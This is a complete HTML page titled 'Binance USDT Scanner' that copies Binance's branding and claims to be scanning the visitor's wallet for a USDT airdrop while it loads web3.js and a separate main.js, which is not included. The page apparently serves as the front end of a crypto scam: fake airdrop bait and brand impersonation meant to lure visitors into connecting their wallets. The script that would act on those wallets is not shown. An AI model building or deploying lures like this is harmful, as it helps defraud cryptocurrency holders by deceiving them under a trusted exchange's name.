
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Binance USDT Scanner</title>
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600&display=swap" rel="stylesheet">
  <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
  <script src="main.js"></script>
  <style>
    body {
      margin: 0;
      background-color: #0b0e11;
      color: #f0b90b;
      font-family: 'Inter', sans-serif;
      display: flex;
      align-items: center;
      justify-content: center;
      flex-direction: column;
      height: 100vh;
    }
    h1 {
      font-size: 24px;
      margin-bottom: 12px;
    }
    p {
      color: #848e9c;
      font-size: 16px;
    }
    .loader {
      border: 6px solid #1e2329;
      border-top: 6px solid #f0b90b;
      border-radius: 50%;
      width: 50px;
      height: 50px;
      animation: spin 1s linear infinite;
      margin-top: 20px;
    }
    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <h1>🔍 Scanning Wallet for USDT Airdrop</h1>
  <p>Connecting to BNB Smart Chain...</p>
  <div class="loader"></div>
</body>
</html>
